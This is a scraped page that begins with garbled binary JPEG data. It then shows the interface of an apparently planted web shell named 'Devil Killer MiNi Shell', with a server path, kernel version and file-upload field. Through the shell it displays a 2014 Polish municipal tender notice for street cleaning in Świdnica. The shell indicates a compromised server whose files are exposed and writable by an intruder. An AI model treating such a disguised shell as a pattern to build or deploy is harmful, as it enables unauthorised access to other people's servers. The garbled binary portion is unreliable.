JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140107/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140107/5036-N-2014.html

<p class="kh_header"><b>Świdnica: Oczyszczanie jezdni dróg gminnych na terenie miasta Świdnica</b><br>
<b>Numer ogłoszenia: 5036 - 2014; data zamieszczenia: 07.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oczyszczanie jezdni dróg gminnych na terenie miasta Świdnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOT  ZAMÓWIENIA

3.1 Lokalizacja
Pas drogowy dróg gminnych miasta Świdnica. 

3.2. Przedmiot zamówienia

Zamówienie obejmuje wykonywanie usług w zakresie oczyszczania jezdni dróg gminnych na terenie miasta Świdnica

3.3 Wspólny Słownik Zamówień CPV: 90.61.00.00-6 - Usługi sprzątania i zamiatania ulic

3.4  Zakres zamówienia obejmuje:

3.4.1 Zadanie A  Oczyszczanie jezdni mechaniczne i uzupełniająco ręczne.
w tym:
- zadanie A1 - oczyszczanie w sezonie letnim 
- zadanie A2 - oczyszczanie w sezonie zimowym

3.4.2 Zadanie B  Usuwanie skutków zdarzeń losowych

3.4.3 Zadanie C Oczyszczanie jezdni na polecenie Zamawiającego w przypadku wystąpienia  niekorzystnych warunków atmosferycznych ( burza, ulewne deszcze ) powodujących duże zanieczyszczenie jezdni. 

3.5 Wykonawca składa ofertę łączną na zadanie A , B i C. 
SZCZEGOŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA                        

1. ZADANIE A  Oczyszczanie jezdni mechaniczne i uzupełniająco ręczne 

Oczyszczanie  jezdni dróg gminnych będzie realizowane poprzez zamiatanie mechaniczne i uzupełniająco ręcznie w sezonie:
-	letnim ( zadanie A1 )
-	 zimowym ( zadanie A2 )
Zamiatanie ręczne będzie stosowane na tych jezdniach na ktorych dopuszczono prawo parkowania samochodów oraz tam, gdzie geometria jezdni nie pozwala na oczyszczanie mechaniczne.
Oczyszczanie będzie realizowane według miesięcznego harmonogramu prac, o którym mowa w § 4 umowy.
Zakres prac przewidziany na dany dzień  będzie  realizowany od godziny 21.00 dnia poprzedniego do godziny 5 rano  dnia następnego. Za zgodą Zamawiającego prace mogą być realizowane w ciągu dnia. 

1.1	Zadanie A1- oczyszczanie w sezonie letnim

         W sezonie letnim oczyszczanie będzie realizowane  poprzez mechaniczne i uzupełniająco ręczne zamiatanie pasa jezdni wzdłuż krawężnika o szerokości do 3 m w kierunku osi jezdni z wyjątkiem dni ,w których będą występowały niekorzystne warunki atmosferyczne np. opady deszczu.
  W okresie letnim w przypadku długotrwałych lub intensywnych opadów deszczu, Zamawiający ma prawo zawiesić prace w zakresie oczyszczania.
      Wynagrodzenie  wypłacane będzie za efektywnie wykonany zakres rzeczywisty prac.
       Informacja o zawieszeniu lub wznowieniu prac będzie przekazywana niezwłocznie przez Zamawiającego faxem lub pocztą elektroniczną. 
         Wykaz dróg do oczyszczania wraz z podaną częstotliwością oczyszczania zawiera część II SIWZ Opis przedmiotu zamówienia rozdział 24.

1.2 Zadanie A2 - oczyszczanie w sezonie zimowym

       Wykonywanie prac w sezonie zimowym uwarunkowane jest występowaniem korzystnych warunków atmosferycznych, umożliwiających efektywne oczyszczanie jezdni. 
       W okresie bezśnieżnym, przy występowaniu  sprzyjających warunków atmosferycznych prace w zakresie oczyszczania będą realizowane w sposób opisany w pkt. 1.1.
       Prace  będą zawieszane w przypadku występowania niekorzystnych warunków atmosferycznych, takich jak: 
-  ujemne temperatury,
-  obfite opady śniegu,
- zaleganie pokrywy śniegowej.
       Powołanie czynnej akcji zimowe utrzymanie dróg oznacza  zaniechanie  prac w zakresie oczyszczania jezdni poprzez zamiatanie mechaniczne i uzupełniająco  ręczne.
      W przypadku powołania czynnej akcji zimowe utrzymanie dróg w godzinach pracy Zamawiającego informacja o powołaniu akcji zostanie niezwłocznie przekazana faxem lub pocztą elektroniczną. 
W przypadku powołania czynnej akcji zimowe utrzymanie dróg poza godzinami pracy Zamawiającego oraz w dni wolne od pracy informacja o powołaniu akcji zostanie niezwłocznie przekazana telefonicznie przez Pełnomocnika Zamawiającego do spraw ZUD.
       Wykonawca ma obowiązek na bieżąco prowadzić obserwację warunków pogodowych w celu podjęcia decyzji  o prowadzeniu prac w zakresie oczyszczania bądź  ich zaniechania. W przypadku  wątpliwości Wykonawca winien zasięgnąć informacji u Pełnomocnika Zamawiającego do spraw ZUD lub u Wykonawcy realizującego prace w zakresie zimowego utrzymania dróg, jakim jest firma Farma Miejska ul. Śląska 11 58-100 Świdnica. 
O zawieszeniu  i wznowieniu prac w zakresie oczyszczania  każdorazowo będzie decydował Zamawiający.  W przypadku zawieszenia prac za okres przerwy w wykonaniu usługi nie będzie wypłacane wynagrodzenie.
         
2. ZADANIE B Usuwanie skutków zdarzeń losowych   

      Usuwanie skutków zdarzeń losowych polega na usuwaniu mechanicznym lub ręcznym zanieczyszczenia spowodowanego zdarzeniem losowym  ( np. stłuczki z kolizji drogowej, wysypanie załadunku materiałów sypkich, wyciek substancji ciekłej itp. ).
  Wykonawca ma obowiązek zapewnić pełną dyspozycyjność w okresie całej doby dla realizacji zadania polegającego na usuwaniu skutków zdarzeń losowych.
      W ramach świadczonych usług Wykonawca zobowiązany jest do przywrócenia stanu pierwotnego nawierzchni jezdni w ciągu 4 godzin od otrzymania zgłoszenia o zaistnieniu zdarzenia.
     Jednostkami upoważnionymi do zobowiązania Wykonawcy w przedmiocie w/w działań jest Referat Dróg, Straż Miejska, Powiatowa Komenda Policji i Powiatowa Komenda Straży Pożarnej. 
      W przypadku zdarzeń drogowych zaistniałych w godzinach pracy Zamawiającego firma likwidująca skutki zdarzenia  przekazuje informację o usunięciu skutków zdarzenia do Referatu Dróg. Referat Dróg sprawdza usuniecie skutków zdarzenia  i potwierdza wykonanie usługi.
      W przypadku zdarzeń drogowych zaistniałych poza godzinami zamawiającego oraz w dni wolne od pracy firma likwidująca skutki zdarzenia przekazuje informacje o usunięciu skutków zdarzenia Straży Miejskiej. Straż Miejska potwierdza wykonanie usługi w protokóle sporządzonym przez Wykonawcę. 

3. ZADANIE C Oczyszczanie jezdni  na pisemne  polecenie Zamawiającego w przypadku wystąpienia niekorzystnych warunków atmosferycznych ( burza, ulewne deszcze ) 

   Oczyszczanie jezdni  na pisemne  polecenie Zamawiającego w przypadku wystąpienia niekorzystnych warunków atmosferycznych ( burza, ulewne deszcze ) powodujących duże zanieczyszczanie jezdni.
      Wykonawca zobowiązany jest do oczyszczenia jezdni w ciągu 48  godzin od otrzymania polecenia Zamawiającego.
    Przedmiar prac  będzie określany na podstawie dokonanego wspólnie z Wykonawcą przeglądu stanu czystości jezdni. Z dokonanego przeglądu będzie sporządzony protokół konieczności.

4.  Prace o których mowa w zadaniu A i C będą wykonywane w dni robocze ( w tym soboty) .

5. Wykonawca we własnym zakresie zapewnia miejsce wywozu odpadów, zgodnie z ustawą z dnia 14.12.2012 r. o odpadach ( Dz. U. z 2013 r. poz. 21 ).
Wykaz jezdni dróg gminnych do oczyszczania mechanicznego i uzupełniająco ręcznego 
  
                                                                                                                      długość w mb    
                                                                                                                                                                                                                                                                                                                                                                                                                                                          I. Drogi oczyszczane 1 raz w tygodniu

1. Wyszyńskiego- obie strony jezdni					-	 820 
2.Komunardów - obie strony jezdni 
z wyłączeniem odcinka lewej strony jezdni 
od ul. Zamkowej do Żeromskiego					-	500 
- Komunardów-Sikorskiego - 2 wysepki				-	195
3. Pl. Grunwaldzki 
- od Al. Niepodległości do Żeromskiego - 
prawa strona jezdni							-	 100 
- po stronie budynków nr 5-8						-	  80 
- po stronie budynków 9-10						-	  50 
- po stronie skweru							- 	 175 
4. Riedla - obie strony jezdni						-	 385 
5. Żeromskiego 
-od Budowlanej do Placu 
Grunwaldzkiego - lewa strona  jezdni					-	  80 
- od Komunardów do Muzealnej -lewa strona jezdni			-	 130 
- od Komunardów do Pl. Grunwaldzkiego - prawa 
strona jezdni								-	 430 
- przy skwerze								-	  60 
6. Saperów -obie strony jezdni wraz z wysepką				-    	1685  
7. Chrobrego - obie strony jezdni					-	 296 
8. Muzealna - obie strony jezdni					-	 282 
9. Prądzyńskiego
- od Wyszyńskiego do Dąbrowskiego - lewa strona jezdni		-	1100
- wzdłuż terenu kościoła						-	 200 
10. Nadbrzeżna - obie strony jezdni					-	1550  
11. Sybiraków - obie strony jezdni					-	 720 
12. Pionierów- obie strony jezdni					-	1528 
- Pionierów - rondo							-	   50 
- Pionierów -wysepki							-	   40 
13. Gdyńska - obie strony jezdni					-	1040 
14. Głowackiego 
  od Wałbrzyskiej do Niecałej - prawa strona jezdni
wraz z wysepką								-	520 
15. Kolejowa - obie strony jezdni					-	1251 
16. Jodłowa 
- od Kopernika do Westerplatte - obie
 strony jezdni								-	1580 
- Jodłowa - skrzyż. przed dawnym dworcem PKP			-	  60 
17.Spacerowa - od Oświęcimskiej bez 
parkingu autobusów PKS - obie strony jezdni				-	1020      
18. Kunic -obie strony jezdni
wraz z zatoką								-	 340 

19. Marcinkowskiego
- od Riedla do E. Plater - lewa strona jezdni 				-	 540 
20. E.Plater- obie strony jezdni						-	 480 
- E.Plater - zatoka autobusowa						-	 240 
21. Okrężna  
-od Kopernika do Kliczkowskiej - obie 
strony jezdni bez zatok							-	1778 
- Okrężna - wjazd przy budynku nr 34 - 
obie strony jezdni							-	  60 
22. Niecała
- od Armii Krajowej do Wschodniej  - obie 
strony jezdni								-	 710 
23.Pl.Ludowy -obie strony jezdni					-	 150 
24.Kanonierska - od Łukasińskiego
do wiaduktu  - obie strony jezdni					-	 560 
25.Parkowa - obie strony jezdni					-	 840 
26. Okulickiego - obie strony jezdni					-	 600 
27. Chopina - obie strony jezdni					-    	1020 
28. Mickiewicza - obie strony jezdni					-	 782 
29. Kościuszki - obie strony jezdni					-	 759 
30. Przyjaźni - odcinek między Kraszowicką 
a Zieloną plus most - obie strony jezdni					-	 270 
- odcinek od Śląskiej do Zielonej - lewa strona jezdni			-	 210  
31. Mieszka - obie strony jezdni					-	1014
32. Leśna - obie strony jezdni						-	1858
33. Łukasińskiego 
-  od Pl. Św. Małgorzaty
do Esperantystów  - obie strony jezdni
wraz z wysepką								-	1490 
34. 1-go Maja - obie strony jezdni					-	 840 
35. Pl. Św. Małgorzaty- główny ciąg jezdny
wraz z rozwidleniem od 1 Maja do Chrobrego
oraz od skrzyżowania do Łukasińskiego					-	 465 
- wysepki								-	  60 
36. Armii Krajowej - obie strony jezdni				-	2050 
37. Ofiar Oświęcimskich - obie strony jezdni				-	1640	
38. Sprzymierzeńców -obie strony jezdni				-	1358 
39. Śląska -od Westerplatte do 
Słowiańskiej - obie strony jezdni					-	3474
-Śląska - rondo oraz wysepki						-	145 
40. Rolnicza
- od Kopernika do MZEC - obie strony jezdni				-	560 
41. 8-go Maja - obie strony jezdni					-	110 
42. Westerplatte -  obie str. jezdni od skrzyżowania z ul. Bystrzycką
do  Pl. Wolności wraz z jezdnią przy parkingu Galerii Świdnickiej	-	1675
43. Wodna - obie strony jezdni						-	 892 
- Wodna 30 -36 wraz z wysepką					-	  65
44. Kopernika - od skrzyżowania z ul. Przemysłową do skrzyżowania 
z ul. Wodną			-	1746
45. Miłego Dnia - obie strony jezdni			-	1000
                                                                                                                    ____________
Razem                                                                                                                  45 708 mb
II. Drogi oczyszczane 2 razy w m-cu

1. Wokulskiego - obie strony jezdni
 o nowej nawierzchni							-	674 
2. Kliczkowska
- od Wrocławskiej do wjazdu na
 dawny parking ŚFUP - obie strony jezdni				-	530 
- od budynku dawnego Urzędu Celnego
do Kopernika - obie strony jezdni					-          1070 
-od Kopernika do Okrężnej - obie strony jezdni				-          1100
3. Mała - obie strony jezdni						-	 138 
4. Wschodnia 
- od ul. Głównej do ul. Michejdy - obie strony
jezdni									-	1134 
5. Strzelińska- obie strony jezdni wraz z wysepkami			-	1325 
6.Garbarska 
- od Matejki do Pl. Ludowego  - obie 
strony jezdni								-	 225 
- górny odcinek ulicy od budynku nr 9
do budynku nr 23 - obie strony jezdni					-	 250 
7. Kilińskiego-obie strony jezdni					-     	1800 
8. Zwierzyniecka - obie strony jezdni					-	 672 
9. Jałowcowa-obie strony jezdni					-    	1000 
10. Jarzębinowa -obie strony jezdni					-	 600 
11. Wrzosowa - obie strony jezdni					-	 300 
12.Przedwiośnie- obie strony jezdni					-	 540 
13.Działkowa - obie strony jezdni
  +  wysepka 								-	 800 
14. Inżynierska  - obie strony jezdni					-	 840 
15. Witosa - obie strony jezdni						-	1600
16. Piekarska - obie strony jezdni					-	 600 
17.Matejki - obie strony jezdni 					-	 180  
18. Kusocińskiego - obie strony jezdni					-	 448 
19.Lompy-obie strony jezdni						-	390 
   -Lompy -zatoka							-	105 
20. Krzywickiego-obie strony jezdni					-	524 
21. Łąkowa- obie strony jezdni						-   	1060 
22. Nasypowa - obie strony jezdni					-	280 
23. Sadowa - obie strony jezdni					-	900 
24. Składowa - obie strony jezdni					-	460 
25. Komunalna - od Wrocławskiej  obie strony
 jezdni o nowej nawierzchni						-	100 
26. Al. Colgate - obie strony jezdni					-	494 
27. Andersa - obie strony jezdni 					-   	1410 
28. Ząbka- obie strony jezdni						-   	2140  
29. Kasztanowa- obie strony jezdni					-    	140 
30. Stalowa - obie strony jezdni					-	1166 
31. Świerkowa - obie strony jezdni					-	452 
32. Stęczyńskiego - obie strony jezdni					-	2238
33. K. Wielkiego - obie strony jezdni					-	2340 
      - rondo K.Wielkiego-Stęczyńskiego					-	80                                                                                                                          
34.Odnowiciela - obie strony jezdni					-	1962 
35. Pobożnego - obie strony jezdni					-	714 
36. Słowiańska - obie strony jezdni					-	2110 
37. M.C. Skłodowskiej 
- od ul. Zamenhofa do ul.Krzywickiego  - 
obie strony jezdni							-    	1198 
38. Sikorskiego 
-od Komunardów do Zamenhofa  - obie strony 
jezdni									-	960			
39. Sikorskiego - od Zamenhofa do Pogodnej
- obie strony jezdni							-          2400
- pętla autobusowa 							-       	170	
40.Wrocławska 
- od mostu żelaznego do Szarych 
Szeregów - obie strony jezdni wraz z wysepką				-    	1497 
41.Rzeźnicza-obie strony jezdni					-	 244 
42.Korczaka - obie strony jezdni					-	 540 
43.Kraszowicka - od Bystrzyckiej do budynku nr 75
lewa strona jezdni							-	1040 
44. Inwalidów Wojennych - obie strony jezdni				-	 240 
45.Tokarzewskiego-obie strony jezdni					-	 580 
46.Roweckiego- obie strony jezdni					-	 328 
47. Kolberga - obie strony jezdni					-	 420 
48. Komorowskiego - obie strony jezdni				-	 200 
49. Fieldorfa - obie strony jezdni					-	 990 
50. Strzegomska - obie strony jezdni wraz z wysepkami		-	 852 
51. Polna Droga - obie strony jezdni					-	1680 
52. Parking przed Urzędem Miejskim		
   i Urzędem Stanu Cywilnego						-	 376 
53.B.Śmiałego - obie strony jezdni					-	 482 
54.B. Krzywoustego - obie strony jezdni				-	 846
55. Kosynierów - obie strony jezdni					-	 514
56. Pileckiego - obie strony jezdni					- 	 360
57. Hetmańska - obie strony jezdni					-	 600
58. Podchorążych - obie strony jezdni					-	 590
                                                                                                                      ____________ 
Razem                                                                                                                 51 998 mb


           
III. Drogi oczyszczane 1 raz w miesiącu


1. Sportowa ( odcinek utwardzony ) - obie strony jezdni		-	468 
2. Al. Brzozowa - obie strony jezdni					-	600 
3 Lipowa - obie strony jezdni						-	480
4. Metalowców - obie strony jezdni					-	1614      
5. Pogodna - obie strony jezdni					-	2300
                                                                                                                          ________
Razem                                                                                                                  5 462 mb.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art. 67 ust. 1 pkt. 6  ustawy Pzp przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż  10 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 11.1 Oferta powinna być zabezpieczona wadium w wysokości :  12 000 zł ( słownie: dwanaście tysięcy złotych ) 

11.2 Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed  16.01.2014 r. przed godz. 09.00.

11.3 Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Pzp z tym, że:

a ) złożone w pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO. 
S.A  I Oddział w Świdnicy  96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.   

b) złożone w gwarancjach ( bankowych, ubezpieczeniowych ):
z treści gwarancji winno wynikać bezwarunkowo ( na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą ) zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Pzp tj. w przypadku gdy Wykonawca:                                             
- odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,                                              
- w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie,
c) złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego jako depozyt, złożony  za potwierdzeniem,  przed upływem terminu składania ofert.
d/ w przypadku złożenia wadium w formie innej niż pieniądz, dokument gwarancji/poręczenia wadialnego winien pod rygorem odrzucenia oferty wskazywać wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia w rozumieniu art.23 ustawy Pzp. 

11.4. Dowód przelewu lub potwierdzenie depozytu ( oryginał ) należy do oferty. 

11.5. Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.

11.6. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy , którego oferta została wybrana  jako najkorzystniejsza.

11.7  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. 

11.8  Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

11.9  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
 c) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunków w wyżej wymienionym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykaże się wykonaniem lub wykonywaniem usług polegających na oczyszczaniu ulic i placów o wartości łącznej nie mniejszej niż  300 000 zł brutto,  w tym jedno zadanie na kwotę minimum 100 000 zł brutto.
Opis dla potwierdzenia tego warunku powinien być zawarty  w załączniku nr 2 do oferty Wykonawcy ( wzór załącznik C do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujący warunek:

6.1.3.1 posiadać lub dysponować  bazą sprzętowo- warsztatową zlokalizowaną na terenie Miasta Świdnica lub Gminy Świdnica.

6.1.3.2 dysponować potencjałem technicznym do wykonania zamówienia 
W tym zakresie zamawiający wymaga aby Wykonawca dysponował dwoma mechanicznymi zamiatarkami samojezdnymi - szerokość zamiatania minimum 230 cm</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujący warunek:
6.1.3.3 dysponować minimum 2 osobami posiadającymi wymagane uprawnienia do kierowania specjalistycznymi pojazdami do zamiatania ulic.

6.1.3.4 dysponować osobą odpowiedzialną za realizację usług posiadającą minimum średnie wykształcenie.

6.1.3.5 posiadać średnie roczne zatrudnienie w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy to za ten okres nie niższe niż 6 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min. 100 000 zł ( sto tysięcy złotych ) oraz, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 100 000 zł ( sto tysięcy złotych ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
